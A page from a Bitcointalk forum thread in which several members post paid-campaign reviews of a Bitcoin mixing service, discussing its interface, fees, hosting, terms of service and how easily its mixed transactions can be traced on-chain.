I understand that there a lot of mining fees, but it would be nice to see a mixing option with lower hops for small amounts. Just receive some else's coins minus fees would be nice for small amounts.

Deposit Address
I was surprised to see a P2SH address format (starting with 3) for the deposit address.

I suggest to upgrade all deposit addresses to native segwit format, bech32 (starting with bc1..) so everyone save money in fees.
You can save about 25% on fees in each transaction just by using bech32 in both sides. This may look small, but as a mixer needs to make many transactions, this may save a lot in the long run.

Order ID
The letter of guarantee was very simple and straight forward, containing all information that was necessary.
It was a .txt file which opened in my default android file explorer app.

I liked the interface of the Order ID, and the URL was easy to save and share if needed.

after mixing completed
At the bottom of the page i saw this information,  which is very good to see. I hope you really delete the order information.

Quote
Order information is automatically deleted after XX

coins received
The transaction I received can be improved in a few ways:

First, the transaction overpaid fees a lot. It paid 53 sat/vbyte, it could be easily confirmed with about 25-30 sat/vbyte.

Blockchair identified the change address and classified the transaction privacy as Critical.


https://blockchair.com/bitcoin/transaction/6f39d73ca4988bcd65dc91f2d64ea87f5b787526d09778c5681a58439a12f049

the transaction had 1 output of different type, so it is obliviously the recipient. Tumbler uses P2SH and I received in my bech32.

Also, one of the outputs, the change, is much smaller than the recipient. Which suggests that it is the change.

.
.BLACKJACK ♠ FUN.
█████████
██████████████
████████████
█████████████████
████████████████▄▄
░█████████████▀░▀▀
██████████████████
░██████████████
████████████████
░██████████████
████████████
███████████████░██
██████████
CRYPTO CASINO &
SPORTS BETTING
▄▄███████▄▄
▄███████████████▄
███████████████████
█████████████████████
███████████████████████
█████████████████████████
█████████████████████████
█████████████████████████
███████████████████████
█████████████████████
███████████████████
▀███████████████▀
█████████
.
examplens
Legendary
*
Offline Offline

Activity: 3276
Merit: 3165


Crypto Swap Exchange


View Profile WWW
September 29, 2023, 06:57:35 PM
 #114

Bitcointalk username: examplens

my test of [banned mixer]

Design: The site definitely has a modern design with all the necessary elements. It seems that the team immediately reacted to some criticisms, and compared to a few days ago, I see that dark mode has been added.
If we talk about dark mode, I think that black (HEX #000000) is not an ideal solution, or at least it should have one more shade. This way we have a barely recognizable text box compared to the background


Or for example, the question mark with the info cloud is almost unrecognizable


However, the site is too generic for me, and maybe I can say that I have seen it somewhere before. It looks like a purchased stock template, so I would comment that more uniqueness is needed here.
Having blog posts on the page brings advantages, but I would instead set up a mixing page as a home page (check sinbad.io for example), and all those who want to know something more always have a menu and additional links.

Hosting: I have to emphasize again, an excellent choice for the domain. One of the best in the mixing industry.
If I saw correctly, you are using hosting from DDoS-Guard, at least IP 186.2.163.50 belongs to them (https://whois.domaintools.com/186.2.163.50) or at least under their protection.
I believe you already know about the negative impact of anonymity when there is an intermediary between your service and the user. However, why choose DDoS-Guard, when they have a rather bad reputation? Mostly bad feedback at Trustpilot (Even those few 5 ratings seem pretty fake, which is even worse, but that's another story)


https://www.trustpilot.com/review/ddos-guard.net

When you say that you delete all logs within 24 hours at the latest, can you be sure that DDoS-Guard also not collecting any data?

Everything is simple. [banned mixer] does not store information about its clients' deposits. All information is stored and encrypted in the tumbler code itself Smiley

As we already mentioned deleting or saving data, you say that you delete all the information, but still keep it encrypted. So the information that you are deleting all the data is not correct (you are misleading the users here) because you still store it somewhere, at least in an encrypted form.
I only hope that the answer does not lie in encryption which is impossible to decrypt. Many hacked services said the same thing before the hacks. I don't expect that someone will hack your (or any other) mixer because of the information about the addresses that passed through the service, only this part should be formulated differently by your side

Mixing:
For the first time, I chose the Basic security level with a 0.42% service fee. With 4h delay, the Anonymizing meter says Good
I don't know if there have been any changes here, but now the mixer asks me to solve the captcha code, unlike the previous days when it just skipped the first step.
Really until the end of the whole process, all the steps were very clear and it was almost impossible to make a mistake due to "not understanding" the process. I personally consider it important and I have to praise it here.
There are several warnings that it is mandatory to download the Letter of Guarantee, but is it possible to insert a step that will enable the further process only after clicking on "download"? Currently, there is only a check box that the user is aware of the importance of the letter of guarantee, and this is just as (un)useful as confirming the age of majority to access a porn site.

What happens to funds that arrive at the generated address after 24 hours? Why can't that order be accessed again with the Tumbler code in case of transaction delay? There are possible legitimate reasons for such a scenario.

In case of closing the page while the order is in progress, you have not left the possibility for the user to open the same page again. If he wants to check the timer that counts down the time until the end of mixing.
I would suggest that you add such a possibility. For example, you can add a link inside the Letter of Guarantee, a new user who closes the page will not know that it is a link format [banned mixer]/order#B8R9QE1O-6Z2UU3 you can add some kind of search box on the site for order ID's, or at least an explanation in the FAQ.

Exactly after 4h 1min, I received a mixed BTC amount. Of course without any connection with my original coins.
I'm not sure if the option "Delete immediately" was added in the meantime while I'm writing this review or if it appears after a certain time, but I wanted to suggest something similar. It should exist immediately after the final transaction is completed.


AML Bot recognized the address from which I received Bitcoin as a low-risk score. Well, even though I chose almost the lowest level of anonymization, it seems satisfactory. Again, I leave open the question of how adequate AMLBot is.




I decided to do the second mixing via the TOR page, with a slightly higher level of anonymity. So, a Premium level of security divides the amount into two addresses.
I tried to add a taproot address which is not supported by [banned mixer], except for the slightly red-marked address field, there are no other indications that something is wrong. The continue button is disabled because of that, which is good as a preventive measure to avoid unnecessary mistakes. However, during the process itself, there is no information as to why it is so (disabled continue button), so it can lead to confusion in this case. It's not a big deal, but it would definitely be useful for users.



Happened to me too, the error page and it is quite possible that the wrong captcha code was entered. However, I received a vague message about where the error was, so I logically decided to do everything from the beginning.
I would emphasize that in such cases, things must be as clear as possible and if there is a mistake, the wrong entry should be unambiguous information about it.



As far as I have noticed, only Segwit addresses are always used for deposits, why not use Bech32, or even better combined?

In addition to the fact that this time I decided on the Premium security level, and entered more addresses, AMLBot showed a higher level of risk, almost worrying.


However, there is more disappointment here, because both addresses received the same funds, that is, they came from the same address. It is very easy to connect them. I am under the impression that it was an unnecessary waste of a fee for an additional address
(I made a chart, if necessary, I can fill in addresses and transactions)


I saw that some other members previously emphasized the excessive fee paid by the mixer. That was also the case with me. 40 and 43 sat/vB, although at that moment the recommended fee from the network was 20 and 27 sat/vB. It seems like an unnecessary waste of resources.



Tumbler code: I'm not sure I have the best understanding of its effectiveness here.

Quote
After each mixing operation the system generates a new TUMBLER CODE for you. We use a TUMBLER CODE to be sure that you will not get your funds back. The same code is used for the discount system. Please, keep it for your next orders and discounts. Notice that after each mixing, the TUMBLER CODE is new.

- The tumbler code is supposed to protect me from getting the same coins again, does that mean that there is a high probability that I will get tainted coins from someone else?
- After two transactions, now I have two different Tumbler codes. Does the new one also inherit the information from the previous one, or in the next mixing can it happen that I get funds back from my first mixing?

Terms & Privacy:

Quote
1.1 SCOPE

This obliging Agreement is between:
- TUMBLERIO Ltd. ("The Service") and
- the person, persons, or entity ("You", "Your" or "the User") using the service (as defined below).

Is [banned mixer] a registered company?

Quote
COIN FILTERING

"The Service" may carry out verification and control of illegal activities with the help of a third party under a contract. "The Service" may terminate Your access to "The Service" with immediate effect for any reason - including, but not limited to, illegal or prohibited activities, at its sole discretion, and is not obligated to reveal the details of its decision.
You accept that "The Service's" decision to take certain actions, including termination for any reason at its sole discretion, may be based on confidentiality criteria that are necessary for "The Service's" security protocols and risk management. You accept "The Service" is not obligated to reveal to you the particularities of its security and risk management processes.

To put it even more simply, you can keep Bitcoins if you judge that they came from illegal activities. Without the obligation to explain the method of how you determined the "illegality" of the funds and whether any third party participated in the analysis?
This does not promise to gain trust.


To summarize my impressions when using the Tumbler mixer.
The whole mixing process on the site looks good. With small corrections, it can really be comfortable for the user to use this service. What may not give a passing grade is the general impression of anonymity and the fact that coins are not untraceable, even a short check through the blockchain is enough to see the connections.

Compared to the current strong competition in the mixer business, this service will have to improve a lot.

Good luck with your business, I hope I have been of help.

█▀▀▀











█▄▄▄
▀▀▀▀▀▀▀▀▀▀▀
e
▄▄▄▄▄▄▄▄▄▄▄
█████████████
████████████▄███
██▐███████▄█████▀
█████████▄████▀
███▐████▄███▀
████▐██████▀
█████▀█████
███████████▄
████████████▄
██▄█████▀█████▄
▄█████████▀█████▀
███████████▀██▀
████▀█████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
c.h.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▀█











▄▄▄█
▄██████▄▄▄
█████████████▄▄
███████████████
███████████████
███████████████
███████████████
███░░█████████
███▌▐█████████
█████████████
███████████▀
██████████▀
████████▀
▀██▀▀
Bitcoin_Arena
Copper Member
Legendary
*
Offline Offline

Activity: 2030
Merit: 1787


฿itcoin for all, All for ฿itcoin.


View Profile
September 30, 2023, 03:16:20 PM
 #115

Bitcointalk username: Bitcoin_Arena

First impression
I love the fact that the site loads fast both on the clearnet and Tor mirror. This is a huge positive. We have a lot of mixers using Cloud-flare and the loading plus captcha challenges as one just tried to visit the site can be quite annoying.

User Interface and Homepage
The UI is nice on both light and dark themes, but the home page could do better with less clutter of information or articles. Most of the information is repetitive, for example, The home page already has two links to the blog and FAQ both at the top and the bottom, so there’s no need to add FAQs or the blogs in the body of the homepage. This makes scrolling to obtain vital details such as the official Bitcoin address and Tor mirror hard. In fact, such details should put somewhere more visible and not hidden at the bottom where one has to scroll a whooping 14 pages down in order to see the bottom. It should be around 2 pages maximum.

DDoS protection service
The service uses DDoS Guard to protect itself against DDoS attacks, which can turn out to be a loophole in the future for a service that promises its customers ultimate privacy. With the dangers DDoS Guard could pose, I think you should look for alternative ways. Better safe than sorry.

Support for different languages
The support for other available languages is pretty good, except for the Terms and Privacy. Whenever I clicked on the terms and privacy while in using another language like Russian or French, the page would automatically revert to the homepage in English. A customer need to clearly understand the terms before they use the service, so how is a Chinese supposed to understand English?

Terms and Privacy
I noticed something rather peculiar about your terms

Quote
Any use of "The Service" in violation of local law is strictly prohibited.

The prohibited activities in this section include, but are not limited to, the following prohibited activities:
- ammunition, firearms, explosives (including fireworks), or "The Service"apons subject to applicable law;
- sales of drugs, research chemicals, or other controlled substances;
- transactions in which third party personal data is disclosed in violation of applicable law;
- infringes or violates intellectual property rights such as trademarks, copyrights, patents, trade secrets;
- providing debt settlement service or credit repair;
- transactions that help Ponzi, pyramid, or other get-rich-quick schemes;
- money laundering or assistance;
- obvious sexual content.
How are you going to determine where the transactions come from? Are you going to involve KYC? Chainalysis? Of course the question is rhetorical, but you get my point.

Quote
COIN FILTERING

"The Service" may carry out verification and control of illegal activities with the help of a third party under a contract. "The Service" may terminate Your access to "The Service" with immediate effect for any reason - including, but not limited to, illegal or prohibited activities, at its sole discretion, and is not obligated to reveal the details of its decision.
You accept that "The Service's" decision to take certain actions, including termination for any reason at its sole discretion, may be based on confidentiality criteria that are necessary for "The Service's" security protocols and risk management. You accept "The Service" is not obligated to reveal to you the particularities of its security and risk management processes.
This feels discomforting, especially coming from a coin mixer that promises absolute anonymity.

Quote
COUNTRY OF RESIDENCE

If You are a resident of the CAR and would like to use [banned mixer], please inform in advance via the Support Service on the website.
Why?

Mixing Process
The mixing page is simplified with pop up definitions or descriptions of each component. The anonymizing meter and fee calculator are a great addition, however the Transaction fee for each receiving Bitcoin address seems to be a little too high.
I noticed that the Bitcoin transaction fees for the transactions to the target are over paid almost all the time

Here are the transaction fees to my target address after the second mixing session today


How about you make that fee dynamic based on the state of the mempool. Let the fee estimator look like that of some popular wallets out there, such as electrum.

I intentionally repeated one of the addresses when entering them on the order details page and on trying to proceed, the continue button was grayed out.
To make it easier for the user to figure out what the problem could be, there should be a small note below the repeated address space.

On the next page, which is one for Order Overview, The letter of guarantee downloaded checks out and can be fully verified. Bitcoin.com is anti Bitcoin and not the Best Bitcoin signature verifier out there. Please suggest something better like Electrum wallet, Sparrow wallet etc

When mixing using the different languages available, I noticed that the Letter of Guarantee is still signed in English.
How about you take it a step further ahead of your competition by providing letters of guarantee depending on the language set by the user when trying to mix.

I mixed two times, but let just point out the results of my second time of mixing. The time range was low, but I was disappointed on how the mixer used change addresses to fund both my target addresses

These were my target addresses.
1. bc1q660842ggcj3gtn20px09u3vxr584gj9h98n68j
2. bc1qltlptzcnvh8apnspue0a7w7hd7p8sa7u424vgl
Notice how the previous change address is used to fund my next address. If I had used 10 addresses, I guess the same thing would have happened. I have no good knowledge of some visualization tools, but this would be a piece of pie for the deanonymization experts.



I also intentionally left the order page time to run out past 24 hours, and nothing else changed apart from the timer.



Once the 24 hours have passed, this order page should expire or the deposit address should be hidden if it has not received any deposit with instructions to the user to start the mixing process afresh

Refreshing it bring this error message, which is persistent. Please fix


Support/Communications channels
The support option is integrated within the site, which could be disadvantageous to customers in case the website goes offline. They will be no way customers can get in touch with you, so you could also include an email option, maybe ProtonMail

Twitter is not necessary, maybe a social network that is more into privacy.

Conclusion
The whole mixing process was smooth and with improvements on the service, it will be an anonymizing service worth paying for. I am not really satisfied with how the coins are mixed and can easily help the Chainalysis experts or services connect the dots without much effort.







.BEST..CHANGE.███████████████
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
██
███████████████
..BUY/ SELL CRYPTO..
Trofo
Legendary
*
Online Online

Activity: 2478
Merit: 2532


Join the world-leading crypto sportsbook NOW!


View Profile
September 30, 2023, 03:43:18 PM
 #116

Bitcointalk username: Trofo





I skimmed trough some of the reviews and I saw multiple people complaining about lack of dark mode. Did you guys not see this or is that maybe not shown correctly on some browsers? Looked really easy to spot to me and I did not even look for it.

My review of [banned mixer]

Setup

I used windows 10 system on a PC I had for a while and I have several browsers installed there. I presumed most of the other users used chrome/firefox/edge so I went with less popular browsers and checked the Tumbler page in Brave/Opera/Vivaldi and Pale Moon. Did the actual mixing in Brave and Vivaldi and used electrum for all my transactions.

Tumbler web page
I really like the look of the page itself; it is simple, clean and easy to use. Just what I am looking for in sites that provide services. Somebody complained it lacks a bit of identity and while that can be a minus from marketing point it is actually a plus for me here. When I am choosing mixers I am choosing them on underlying technology and ease of use, UI should be minimal and not encumbered with unnecessary graphics that just distract users.

Mixing process
It was all straight forward and I did not need to look into FAQ or ask for help from live support in any point of the process. I must admit I am not a mixer user in general but I did try Chipmixer, Sinbad and Whirlwind before this one, so I would say I have solid experience. Everything was clear all the time and it was smooth experience. Here are two pictures showing my chosen options.





Why is there a need for captcha? Never seen that on mixer before. Are there bots using mixing services and even if there are why would that be a problem if they are paying same fees.

What happens if user does not send the transaction in 24 hours and is unaware of the time limit? Are the funds lost? What happens in case we loose internet connection or our PC resets, I don't see a way how to continue with just info from our tx.


Fees:
Fees are too high for small amounts (flat address creation fee) but I don't think that is a big minus since I sort of expect majority of mixer users to do bigger transactions. Can't really think of a reason why would someone mix 1 mBTC amounts other than testing purposes like we are doing here.

On the other hand Tumbler is sending transactions with really high fees all the time. This seems problematic for two reasons.
First: it could be cheaper and there could be significant savings made on large amount of transactions. For instance my tx had fee of 43 sat/byte while 10 would be overpaying for first block confirmation.
Second: It could be used by blockchain analyses software to auto target Tumbler transactions

Tumbler code for next order
This is quite unclear how it works. I get it in broad sense, it is used to avoid receiving your own BTC in next transaction. Problem is why is that necessary? Are our funds just waiting on that one addy and will be sent to next person? This has broad security implications and I feel like I could get "dirtier" BTC back than ones I started with. FAQ does not explain this in any greater detail.

Furthermore please add explanation for Tumbler code on following page:



I had no idea what it is for since I chose immediate transfer on first try and did not see the screen where this is shown:




General conclusion:
Frontend is good and does not much work in my opinion. Just add some more explanations in right places as I mentioned above with Tumbler code.

Backend needs a lot of work to reach the level of best mixers out there. First there is a feeling like there should be much more funds available. Comment that I need to use a code to avoid getting same BTC back in next transaction really surprised me. There should be variable fees implemented which will monitor the state of mempool and add some sort of random element to them. Would also like to read much more about how actual mixing works (what is happening with our BTC on Tumbler wallets). For instance we all knew how Chipmixer had premade chips which the user would then get private keys for. I like to know how the service I am using actually works before I would trust them with serious amount of money.


█████████████████████████
████▐██▄█████████████████
████▐██████▄▄▄███████████
████▐████▄█████▄▄████████
████▐█████▀▀▀▀▀███▄██████
████▐███▀████████████████
████▐█████████▄█████▌████
████▐██▌█████▀██████▌████
████▐██████████▀████▌████
█████▀███▄█████▄███▀█████
███████▀█████████▀███████
██████████▀███▀██████████
█████████████████████████
.
BC.GAME
▄▄░░░▄▀▀▄████████
▄▄▄
██████████████
█████░░▄▄▄▄████████
▄▄▄▄▄▄▄▄▄██▄██████▄▄▄▄████
▄███▄█▄▄██████████▄████▄████
███████████████████████████▀███
▀████▄██▄██▄░░░░▄████████████
▀▀▀█████▄▄▄███████████▀██
███████████████████▀██
███████████████████▄██
▄███████████████████▄██
█████████████████████▀██
██████████████████████▄
.
..CASINO....SPORTS....RACING..
█░░░░░░█░░░░░░█
▀███▀░░▀███▀░░▀███▀
▀░▀░░░░▀░▀░░░░▀░▀
░░░░░░░░░░░░
▀██████████
░░░░░███░░░░
░░█░░░███▄█░░░
░░██▌░░███░▀░░██▌
░█░██░░███░░░█░██
░█▀▀▀█▌░███░░█▀▀▀█▌
▄█▄░░░██▄███▄█▄░░▄██▄
▄███▄
░░░░▀██▄▀


▄▄████▄▄
▄███▀▀███▄
██████████
▀███▄░▄██▀
▄▄████▄▄░▀█▀▄██▀▄▄████▄▄
▄███▀▀▀████▄▄██▀▄███▀▀███▄
███████▄▄▀▀████▄▄▀▀███████
▀███▄▄███▀░░░▀▀████▄▄▄███▀
▀▀████▀▀████████▀▀████▀▀
Hamza2424
Legendary
*
Offline Offline

Activity: 966
Merit: 1042


#SWGT CERTIK Audited


View Profile WWW
September 30, 2023, 05:34:25 PM
 #117

Username: Hamza2424

Reviewing [banned mixer], here is my review of the tumbler mixing service and the overall experience with the mixing service. I'm trying to use the hybrid comparison approach, comparing the Mixing service with the competitors and my own mixing experience on the platform as well, I tried 2 transactions with a Security level of Basic and standard on two different browsers.

Mixing Review

Directly moving to the mixing service the service fee offered by the tumbler is quite decent as compared to the other mixers, Tumbler offers a service of min 0.40% to max 5%.

  • First Mixing

     ☑ Browser: Firefox
     ☑ Amount: 0.002 BTC
     ☑ Total Fee: 0.0004 BTC In Receiving addresses
     ☑ No of Reciivng Address: 2
     ☑ Mixing: Basic

    Rating: 3/5

    In the first mixing the basic mixing service is used for mixing the coins and the additional information is mentioned above, In this mixing the service used is 0.41%, As per the mixing on the receiving end two different delays are chosen for 6min and 18min respectively. Overall that was a smooth experience but I would to mention here that there were a lot of Mentions to DownloadLatter of Guarantee and for a newbie who is not very familiar with the Mixing service platform made it very easy, He can mix the coins smoothly.



    While Reviewing the Mixed coins privacy I would like to add that the privacy level of the mixed coins on the Basic standard is average, it made a score of 60 points and easily got tracked, and immediately Blockchain linked both my receiving addresses I think it could have been more efficient if we had increased the transaction delay.


    The mixing service fee is decent (Lower compared to others) but at the same time the transaction fee for every receiving address is Quite high, In a case where a person is trying to move a small amount like 0.01BTC or 0.02BTC and using 5 receiving address, this fee is quite high.

  • Second Mixing

     ☑ Browser: Chrome
     ☑ Amount: 0.002 BTC
     ☑ Total Fee: 0.0004 BTC In Receiving addresses + 3.63% Service fee
     ☑ No of Reciivng Address: 2
     ☑ Mixing: Premium

    Rating: 1.5/5

    The mixing standard is premium while considering the second mixing test and the service fee charged is 3.62%, some additional information is mentioned above, 2 receiving addresses are used here as well to compare the mixing quality with the basic level, In the results I'm not at all satisfied I'm not sure why but the privacy score is so disappointing as per in premium service my address won't get tracked as per it was a concern in Basic service by the Privacy score is 20.


    It's not at all reasonable as there is a need for improvement, My receiving address didn't get tracked but it could be due to the previous mixing I tried a lower delay in my transaction here this time the delay was 28min for the first receiving address and 1hour 8min for the second receiving address. Here While mixing coins on the Chrome browser I encountered a laggy UI, and for some reason, I tried 2 to 3 times while creating an order. Unfortunately due to a sudden network issue, I did create an order again.



UI Experience

To be honest, I'm a little bit confused while discussing the UI, as there are not many bugs I have encountered in the UI but there are No without JS-UI support, the UI was responsive while I was using it on Firefox, at the time I did found it a bit laggy while using it for the second mixing on the chrome browser. It would be better if there is any Without-JS support available or a lighter mode of the UI. While going through the whole process of mixing from getting in to getting out the UI helps a lot a very decent newbie guide approach, where a lot of Cauptions as for the latter of garutnee and for the multi deposits on the same order generated address.

A good approach overall but I think there is a high need for a lighter version of UI without JS support. I was checking in the initial reviews, there was no Dark mode support and now it's working correctly. Hoping for more to be updated sooner.

UI Rating: 3/5

Suport Response

First of I would like to mention that there's a bug in the support chat at least I have encountered many times on two different devices, using the firefox I tried to ask a few questions and consistently after finishing the question when I tried to click on the Send Message button the question disappeared and I did test it many many times, sometimes when I use to write something and again to add some more in the same question the previous message gets disappeared, I don't know why but there an issue in the Chat Box even sometimes after writing query if you wait for a couple of seconds and again try to send message the message gets disappeared. I tried my best to explain what was happening. On both of the devices, I was using Firefox and the Grammarly plugin installed to avoid typo errors.

At the same time, I think there is a need for notification on the Support Response and a timer as well to delete the chat History, as the chat section records the Previous history there's a manual chat deletion option but for a better approach there is need of a timer to delete the chat. The overall response is better than some of the competitors but it still needs to be improved by a few suggestions I have mentioned.

Support Rating: 2.5/5

[banned mixer] With Other Market Competitors

In this section I'm trying to cover the highlighting features of [banned mixer] and other mixing competitors in the market, I will try my best to cover as much as possible what Tumbler is offering and what the others are offering. I checked 5 different mixers and my ending thoughts after comparing are as follows

Pros:

 ✓ Provide a Higher number of receiving address Support compared to competitors (up to 10)
 ✓ A lower Basic Mixing service fee of 0.4%
 ✓ Single confirmation support to proceed with the order
 ✓ Transactions are much after compared to most of the competitors
 ✓ Better Discount Program
 ✓ No logs Policy (I'm not sure as I can see there is 24 order details timer)
 ✓ Regular Boosting with Tumbler code

Cons:

 ☆ No Taproot support
 ☆ No Without JS Version
 ☆ Although transactions are faster but costly compared to others.
 ☆ No Partner System (Refferal System)
 ☆ No captcha protection in Start (Do consider additional captcha as well) maximum
    competitors support multi-captcha protection.
 ☆ The Support System is not very Reliable.
 ☆ Need to Improve the privacy level, especially in Premium mixing.
 ☆ Consider the notifications in the support system.

I don't want to make much recurrent but for a mixer what matters is the privacy, protection, and Cost, In service cost Tumbler, is the first choice, privacy I'm not so sure as per the Basic mixing privacy I'm a bit satisfied but for the premium one the results are disappointing maybe it can be due to the lower Pool capital but cant give any benefit of the doubt in a review. Protection is OK in my view but some additional layers can make it leading one on this point as well. UI does and doesn't matter in most cases.

Ending Thoughts

Tubmler is a decent centralized mixing platform, it assists us with the service fee but the total transaction fees need some improvements overall it is a considerable mixing platform. For those who are new to Bitcoin mixing, I would recommend you to use Tumbler as here platform its UI assists you in every way to protect, no log policy is widely covered still the order details remain on count 24 hours after this specific timeline if you havent deleted by yourself platform removes itself. In Support sometimes they respond really but sometimes they make it more difficult to be considered as reliable if there's an emergency.

FAQ covers a very decent segment here as I have seen many other platforms FAQ but for the beginners they've made it easy to know almost the maximum of the things, The Mixing service is reliable I had tested Basic and saw a couple of users reviewing standard as well which comes with some decent results comparing to the market competitors but on the premium service tested by me is not satisfying there is the room of developments.

I'm gonna end it here, if you are a newbie/beginner its highly recommended to use [banned mixer], for the members who mix their coins mostly I would say read most of the reviews and then make a decision, for now, team is improving their services, after a few updates I think tumbler is gonna be a strong competitor for other, but it needs some improvements.

AB de Royse777 (OP)
Legendary
*
Offline Offline

Activity: 2478
Merit: 3893


Hire Bitcointalk Camp. Manager @ r7promotions.com


View Profile WWW
September 30, 2023, 07:38:25 PM
Merited by Potato Chips (1)
 #118

I am happy that Group 1 submitted their reviews.

From group 2 following users, please do not miss your deadline.

Code:
Wind_FURY
Faisal2202
Potato Chips
GeorgeJohn
Cheers,

..Stake.com..   ▄████████████████████████████████████▄
   ██ ▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄ ██  ▄████▄
   ██ ▀▀▀▀▀▀▀▀▀▀ ██████████ ▀▀▀▀▀▀▀▀▀▀ ██  ██████
   ██ ██████████ ██      ██ ██████████ ██   ▀██▀
   ██ ██      ██ ██████  ██ ██      ██ ██    ██
   ██ ██████  ██ █████  ███ ██████  ██ ████▄ ██
   ██ █████  ███ ████  ████ █████  ███ ████████
   ██ ████  ████ ██████████ ████  ████ ████▀
   ██ ██████████ ▄▄▄▄▄▄▄▄▄▄ ██████████ ██
   ██            ▀▀▀▀▀▀▀▀▀▀            ██ 
   ▀█████████▀ ▄████████████▄ ▀█████████▀
  ▄▄▄▄▄▄▄▄▄▄▄▄███  ██  ██  ███▄▄▄▄▄▄▄▄▄▄▄▄
 ██████████████████████████████████████████
▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄
█  ▄▀▄             █▀▀█▀▄▄
█  █▀█             █  ▐  ▐▌
█       ▄██▄       █  ▌  █
█     ▄██████▄     █  ▌ ▐▌
█    ██████████    █ ▐  █
█   ▐██████████▌   █ ▐ ▐▌
█    ▀▀██████▀▀    █ ▌ █
█     ▄▄▄██▄▄▄     █ ▌▐▌
█                  █▐ █
█                  █▐▐▌
█                  █▐█
▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀█
▄▄█████████▄▄
▄██▀▀▀▀█████▀▀▀▀██▄
▄█▀       ▐█▌       ▀█▄
██         ▐█▌         ██
████▄     ▄█████▄     ▄████
████████▄███████████▄████████
███▀    █████████████    ▀███
██       ███████████       ██
▀█▄       █████████       ▄█▀
▀█▄    ▄██▀▀▀▀▀▀▀██▄  ▄▄▄█▀
▀███████         ███████▀
▀█████▄       ▄█████▀
▀▀▀███▄▄▄███▀▀▀
..PLAY NOW..
Faisal2202
Sr. Member
****
Offline Offline

Activity: 1204
Merit: 466


#SWGT CERTIK Audited


View Profile WWW
September 30, 2023, 08:57:02 PM
 #119

From group 2 following users, please do not miss your deadline.
Code:
Faisal2202
Sorry for the delay, I was stuck in a wedding ceremony for the previous two days and did not have time to write a review, but I am now free, just returned home, and I will submit my review before the deadline.

Wind_FURY
Legendary
*
Offline Offline

Activity: 2912
Merit: 1825



View Profile
October 01, 2023, 06:27:19 AM
 #120

I will write this review according to my personal experience and according to my limited technical knowledge, because I am not a "computer security expert", a blockchain developer, nor am I a kind of user that requires absolute anonymity in the blockchain. But I do have questions and personal opinions, and I might have found some things which could help [banned mixer] improve their service.

Mixer Name: [banned mixer]
Test Date: September 30, 2023
Reviewer: Wind_FURY


Introduction

- [banned mixer] is a Bitcoin MIxer that obfuscates a user's transaction trail, and like other mixers/tumblers, it also helps increase the network's "anonymity set".

Impression

- The website's UI/ UX is very straight-forward, very easy to understand, and everything a user needs is easy to find. Because it uses a modern framework based on Javascript, it's also very functional in small screens/mobile.

The Test

- For my tests, I did it in two parts. The standard, "I will use the default settings" test, AND the premium "I want to be more anonymous" test.

A. Default Settings Test

- This test was done in a mobile phone, with a Safari browser. Everything was very easy, simple, and designed that newbies who had basic knowledge can use the service.



- There's actually nothing more to say except for a "critical privacy" issue warning from BlockChair, which might not be an actual issue for this test, but I possibly found an issue in my premium test.

B. Premium Test

- In this test I used a TOR Browser, I used a higher fee, and added one more receiving address. The website worked perfectly. No issues with UI/ UX, BUT I need to say that I used the TOR browser in default settings, without script blocking extensions.



- But I may have found an issue. I checked the transactions of the change address of one of the senders, and I saw another transaction that might be by another fellow tester? I checked both of my receiving address and I can confirm that it isn't mine. If it's actually an address by a fellow tester, it could be a serious issue for everyone who uses the mixer.



Other Comments

- It's mentioned in [banned mixer]'s Terms that the mixer might use a service of a third party to filter outputs. My fellow posters in the forum know that I believe there's nothing wrong with taking this trade-off to protect itself and its ability to provide a service. BUT it opens a can of worms because how can the users refute a false positive?
        
The filtering entity could always say that a positive whether true or false is proof that the system works, but a "false negative" is merely because it's not filtering restrictive enough. Then instead of helping increase Bitcoin's anonymity set, [banned mixer] might be its own problem to the vision it has set for itself.

- Accept Lightning transactions. I'm not sure about the implementation, but It's probably good to give the users a choice whether to send their coins on-chain or off-chain through Lightning, not because it's cheaper, but because it adds another layer of anonymity and privacy.

- Fees. They're high. Although because of my own understanding and belief of what the Bitcoin network should actually be, some of the time I don't mind paying for higher fees than average, but like my fellow testers' suggestions, if you could make it lower, then make it lower.

██████████████████████
█████████████████████████
█████████████████████████
█████████████████████████
█████████████████████████
█████████████████████████
█████████████████████████
█████████████████████████
█████████████████████████
█████████████████████████
█████████████████████████
█████████████████████████
██████████████████████
.SHUFFLE.COM..███████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
█████████████████████
████████████████████
██████████████████████
████████████████████
██████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
██████████████████████
██████████████████████
██████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
███████████████████████
.
...Next Generation Crypto Casino...
Pages: « 1 2 3 4 5 [6] 7 »  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!